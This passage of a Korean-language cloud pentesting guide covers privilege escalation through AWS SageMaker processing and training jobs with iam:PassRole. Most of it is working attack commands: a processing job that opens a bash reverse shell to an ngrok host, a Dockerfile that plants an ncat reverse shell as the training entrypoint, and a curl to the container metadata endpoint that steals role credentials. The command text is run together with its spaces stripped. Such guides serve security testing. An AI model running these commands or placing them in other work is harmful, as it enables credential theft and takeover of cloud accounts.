응답에는 새로 생성된 노트북 인스턴스의 ARN을 포함하는 NotebookInstanceArn 필드가 포함되어야 합니다. 그런 다음 create-presigned-notebook-instance-url API를 사용하여 노트북 인스턴스가 준비되면 액세스하는 데 사용할 수 있는 URL을 생성할 수 있습니다:
해당 권한을 가진 공격자는 sagemaker가 처리 작업을 실행하도록 할 수 있습니다. 공격자는 AWS 관리 ECS 계정 인스턴스에서 실행될 컨테이너의 정의를 지정할 수 있으며, 연결된 IAM 역할의 자격 증명을 훔칠 수 있습니다.
# I uploaded a python docker image to the ECRawssagemakercreate-processing-job \--processing-job-name privescjob \--processing-resources '{"ClusterConfig": {"InstanceCount": 1,"InstanceType": "ml.t3.medium","VolumeSizeInGB": 50}}' \--app-specification "{\"ImageUri\":\"<id>.dkr.ecr.eu-west-1.amazonaws.com/python\",\"ContainerEntrypoint\":[\"sh\", \"-c\"],\"ContainerArguments\":[\"/bin/bash -c \\\"bash -i >& /dev/tcp/5.tcp.eu.ngrok.io/14920 0>&1\\\"\"]}" \
--role-arn <sagemaker-arn-role># In my tests it took 10min to receive the shellcurl"http://169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI"#To get the creds
잠재적 영향: 지정된 sagemaker 서비스 역할로의 권한 상승.
sagemaker:CreateTrainingJob, iam:PassRole
해당 권한을 가진 공격자는 훈련 작업을 생성할 수 있으며, 임의의 컨테이너를 실행하고 연결된 역할을 사용할 수 있습니다. 따라서 공격자는 역할의 자격 증명을 훔칠 수 있습니다.
이 시나리오는 이전 것보다 악용하기 더 어렵습니다. 왜냐하면 공격자가 rev shell 또는 자격 증명을 직접 보내는 Docker 이미지를 생성해야 하기 때문입니다(훈련 작업의 구성에서 시작 명령을 지정할 수 없습니다).
# Create docker imagemkdir/tmp/rev## Note that the trainning job is going to call an executable called "train"## That's why I'm putting the rev shell in /bin/train## Set the values of <YOUR-IP-OR-DOMAIN> and <YOUR-PORT>cat>/tmp/rev/Dockerfile<<EOFFROM ubuntuRUN apt update && apt install -y ncat curlRUN printf '#!/bin/bash\nncat <YOUR-IP-OR-DOMAIN> <YOUR-PORT> -e /bin/sh' > /bin/trainRUN chmod +x /bin/trainCMD ncat <YOUR-IP-OR-DOMAIN> <YOUR-PORT> -e /bin/shEOFcd/tmp/revsudodockerbuild.-treverseshell# Upload it to ECRsudodockerlogin-uAWS-p $(awsecrget-login-password--region<region>) <id>.dkr.ecr.<region>.amazonaws.com/<repo>sudodockertagreverseshell:latest<account_id>.dkr.ecr.<region>.amazonaws.com/reverseshell:latestsudodockerpush<account_id>.dkr.ecr.<region>.amazonaws.com/reverseshell:latest
# Create trainning job with the docker image createdawssagemakercreate-training-job \--training-job-name privescjob \--resource-config '{"InstanceCount": 1,"InstanceType": "ml.m4.4xlarge","VolumeSizeInGB": 50}' \--algorithm-specification '{"TrainingImage":"<account_id>.dkr.ecr.<region>.amazonaws.com/reverseshell", "TrainingInputMode": "Pipe"}' \
--role-arn <role-arn> \--output-data-config '{"S3OutputPath": "s3://<bucket>"}' \--stopping-condition '{"MaxRuntimeInSeconds": 600}'#To get the credscurl"http://169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI"## Creds env var value example:/v2/credentials/proxy-f00b92a68b7de043f800bd0cca4d3f84517a19c52b3dd1a54a37c1eca040af38-customer
해당 권한을 가진 공격자는 (잠재적으로) 하이퍼파라미터 훈련 작업을 생성할 수 있으며, 임의의 컨테이너를 실행하고 연결된 역할을 부여할 수 있습니다.
시간 부족으로 인해 악용하지 않았지만, 이전의 악용과 유사해 보입니다. 악용 세부정보와 함께 PR을 보내주시면 좋겠습니다.
